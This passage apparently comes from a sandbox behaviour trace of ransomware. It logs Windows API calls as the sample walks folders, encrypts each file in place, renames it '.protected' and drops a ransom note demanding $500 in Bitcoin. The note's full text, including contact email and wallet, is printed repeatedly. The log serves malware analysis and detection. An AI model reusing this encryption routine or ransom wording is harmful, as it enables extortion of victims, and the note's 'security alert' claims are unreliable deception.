HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\.") returned 152 [0083.989] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.989] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.989] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.989] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.989] lstrcmpiW (lpString1="..", lpString2="Program Files 
(x86)") returned -1 [0083.989] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.989] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\..") returned 153 [0083.989] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.989] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.989] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.989] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.989] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.989] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.989] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.989] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.989] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.989] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.990] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.990] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json") returned 164 [0083.990] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.990] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.992] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.992] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.993] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.993] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.993] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.993] CloseHandle (hObject=0x168) returned 1 [0083.993] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.protected") returned 174 [0083.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\messages.json.protected")) returned 1 [0083.994] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.994] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\RESTORE_FILES.txt") returned 168 [0083.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.994] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.994] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.995] lstrlenA (lpString="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") returned 684 [0083.995] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.995] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.995] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.995] CloseHandle (hObject=0x164) returned 1 [0083.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0083.996] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0083.996] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0083.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned 150 [0083.996] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0083.996] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0083.996] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*") returned 152 [0083.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.996] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.996] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.996] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.996] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.997] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.997] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\.") returned 152 [0083.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.997] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.997] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.997] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.997] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.997] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\..") returned 153 [0083.997] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.997] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.997] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.997] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.997] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.997] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.997] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.997] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.998] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") returned 164 [0083.998] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.998] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json") 
returned 164 [0083.998] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.998] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.000] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.000] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.000] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.000] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.000] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.000] CloseHandle (hObject=0x168) returned 1 [0084.000] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.protected") returned 174 [0084.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\messages.json.protected")) returned 1 [0084.001] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.001] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.001] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\RESTORE_FILES.txt") returned 168 [0084.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.002] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.002] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.003] lstrlenA (lpString="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") returned 684 [0084.003] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.003] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.003] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.003] CloseHandle (hObject=0x164) returned 1 [0084.003] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0084.003] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0084.003] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned 150 [0084.003] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0084.003] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0084.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*") returned 152 [0084.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0084.003] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.003] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.003] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.003] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.003] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\.") returned 152 [0084.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\..") returned 153 [0084.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.004] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.004] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.004] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\messages.json") returned 164 [0084.004] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.004] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.004] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.004] CryptEncrypt (in: hKey=0x444cf8, 